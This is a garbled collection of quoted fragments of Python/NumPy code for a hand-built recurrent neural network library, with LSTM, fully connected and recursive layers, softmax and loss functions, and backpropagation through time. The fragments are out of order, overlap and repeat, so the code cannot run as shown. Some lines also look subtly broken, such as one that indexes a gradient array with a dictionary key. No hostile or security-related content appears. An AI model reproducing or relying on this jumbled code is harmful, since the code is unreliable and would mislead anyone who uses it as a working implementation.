np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act =", "= cells[t - 1] if t > 0 else c0 inputs[t, :, -1]", "of columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct)", "inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:,", "h0 previous_cell = cells[t - 1] if t > 0 else c0 inputs[t,", "np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]])", "dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 =", "if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous =", "self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1],", "shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen", "result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where", "dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully Connected recursive layer", "self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None,", "else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0, 'dCell':", "= np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct", "/ np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as", "inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs,", "product of two matrices is a sum of tensor products of columns and", "dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 -", "self.layers[l].eval_for_back_prop(out) cache_out[l] = { 
'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0':", "self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :,", "out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0,", "for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers):", "x be a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY ->", "matrix product dW=x.T*dY where x holds x_i as its rows and dY holds", "+ 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] =", "- 1] if t > 0 else h0 previous_cell = cells[t - 1]", "0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t,", "np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs,", "dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t -", "x holds x_i as its rows and dY holds dY_i as its rows", "self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] =", "* self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) '''", "h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] +", "respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t,", "''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt(", "# dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t]", "None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation =", "1. / (1. 
+ np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:]", "input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] =", "= inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. / (1. +", "batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs =", "time_steps): previous = outputs[t - 1] if t > 0 else h0 previous_cell", "cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :,", "input for l in self.layers: out = l(out) return out def init(self): for", "can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous", "cache_out = [None] * self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()):", "self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]])", "Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None", "__call__(self, input): ''' input is to be a rank 3 tensor ''' out", "cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn']", "= shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1]", "* self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 *", "None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t]", "dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache", "np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]])", "matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the", 
"cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn", "dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix", "t > 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]]", "= np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): '''", "predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l],", "- input_2) / np.size(input_1) class softmax: ''' Only to be used as the", ":, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2", "def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation", "= outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]])", "0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t,", "activations[t, :, 0:3 * self.shape[1]] = 1. / (1. 
+ np.exp(-raws_[:, 0:3 *", "dC_previous = (cell[t - 1], dCell[t - 1]) if t > 0 else", "dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer Paper can", ":] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] =", "3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :,", "is covered by a previous call to softmax_loss function ''' return 1 class", "3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2", "-= 1 return tmp_ class rNet: layers = [] num_of_layers = None def", "inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch,", "dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self,", "softmax: ''' Only to be used as the last non-recursive layer ''' def", "''' def __call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return", "+= np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr:", "cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW =", "-1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous", "** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] #", "inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs,", "dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x holds", "reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums the", "self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0]", "* scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) 
return", "* self.shape[1]:] ** 2) ''' the following line sums the gradients over the", "of two matrices is a sum of tensor products of columns and rows", "out = l(out) return out def init(self): for l in self.layers: l.init() def", "out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t]", "= cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW", "''' shape = None weights = None previous = None activation = None", "/ np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self):", "return input def d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2):", "= None def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def", "activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t,", "dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh", "__call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1,", ":, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:]", "return np.tanh(input) def d(self, input): return 1 - input * input class sigmoid:", "batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy()", "= cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1])", "in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums", "np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 -", "= np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1] +=", "dY holds dY_i as its rows In other words, a product of two", ":, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * 
dCell[t] # dwrite_c dAct[t,", "dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully", "self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell = None def reset(self):", "[] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input):", "= None def reset(self): self.previous = None self.cell = None def __call__(self, input_tensor):", "[None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn,", "def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0]", "in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] +", "(1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following line", "= cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 =", "+ self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch,", ":, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t,", "outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs", "c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 =", "= 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self,", "def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization", "input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3", "outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1],", "matrix and (dY_i) matrix 
dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which", "= np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws =", "return 1 class softmax_loss: ''' To be used in combination with sofmax '''", "= np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch,", "0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 -", "0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous", "len(self.layers) def __call__(self, input): ''' input is to be a rank 3 tensor", "and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is", "0 else h0 previous_cell = cells[t - 1] if t > 0 else", "train_on=None): ''' it returns 1, as the derivative is covered by a previous", "* cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act':", "not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out,", "t > 0 else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]]", "dh = dH[t - 1] if t > 0 else dh0 dh +=", "= cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape)", "dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH", "= dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the", "= cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape", "self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for", "cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps,", 
"dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire", "(1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]]", "-1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs,", "Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we have (x_i)", "dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act =", "= self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0'])", "dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short", "0 else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t]", "np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps,", "if t > 0 else h0 inputs[t, :, -1] = 1 inputs[t, :,", "outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps,", "dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product", "'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs']", "dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c", "* self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:]", "self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for l in range(0,", "dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: '''", "is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None:", "for t in reversed(range(0, time_steps)): dAct = dOut[t] * 
self.activation.d(outputs[t]) ''' the following", "in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :,", "def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs =", "input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) /", "# activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3", "not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t]", "self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell = None", "else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class", "dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1]", "'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs']", "= np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t],", "np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]])", "time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput =", "__init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1): self.weights", "l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer '''", "self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None:", "time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients", "np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[-", "in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 
1]) raws", "dot product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired", "weights = None activation = None def reset(self): pass def __init__(self, shape, activation=identity()):", "in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()):", "= activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1])", "cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput", "rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T)", "the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return", "dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] =", "= cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps,", "sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None):", "its rows and dY holds dY_i as its rows In other words, a", "outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]])", "inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] *", "def d(self, input): return input * (1 - input) class identity: def __call__(self,", "1], dCell[t - 1]) if t > 0 else (c0, dc0) # dforget", "activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]}", "if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t", "* self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l],", "np.zeros([time_steps, batch, 
self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is", "add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] *", "self.layers: l.init() def reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_)", "= np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch,", "dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch,", "class LSTM: ''' Long Short Term Memory layer Paper can be found at:", "reset(self): self.previous = None self.cell = None def __call__(self, input_tensor): outputs, cache =", "cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if", "def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out", "'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def", "= input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs =", ":, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] =", "+ self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1,", "outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self,", "activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs,", "None self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous)", "1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ =", "def __call__(self, input): ''' input is to be a rank 3 tensor 
'''", "= self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs", "self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else:", "= np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn =", "else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t,", "input): return 1 / (1 + np.exp(-input)) def d(self, input): return input *", "rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:,", "> 0 else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] =", "for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) *", "outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0,", "reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2", "l in self.layers: out = l(out) return out def init(self): for l in", "inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0,", "cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out,", "l.init() def reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def", "None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return", "1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t", "for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += 
np.sum(cost(out[t], predictions[t]),", "if t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW,", "return loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def", "= dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully Connected recursive", "input is to be a rank 3 tensor ''' out = input for", "mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act']", "inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW =", "- 1]) if t > 0 else (c0, dc0) # dforget dAct[t, :,", "return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs =", "class softmax: ''' Only to be used as the last non-recursive layer '''", "''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]]", "np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct =", "a sum of tensor products of columns and rows of the respected matrices", "_ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape", "dY_i as its rows In other words, a product of two matrices is", "combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self,", "= self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for i,l", "its rows In other words, a product of two matrices is a sum", "activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 *", "dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer Paper", "cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = 
cache['c0']", ":, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t,", "self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs,", "d(self, input): return input * (1 - input) class identity: def __call__(self, input):", "+= np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) '''", "input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_", "in range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is not None:", "tensor products of columns and rows of the respected matrices ''' dW +=", "None weights = None activation = None def reset(self): pass def __init__(self, shape,", "activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 -", "cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out =", "Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x holds x_i", "dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0", "layers = [] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def", "* self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t]", "__call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_ /", "out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor,", "= np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t]", "self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1,", "dCache is not 
None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct", "else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t,", "and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] =", "= outputs[t - 1] if t > 0 else h0 inputs[t, :, -1]", "outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs']", "None activation = None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape =", "words, a product of two matrices is a sum of tensor products of", "def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is to", "self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if cache0 is not", "self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init !=", "in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' %", "h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_", "c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :,", "{'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': 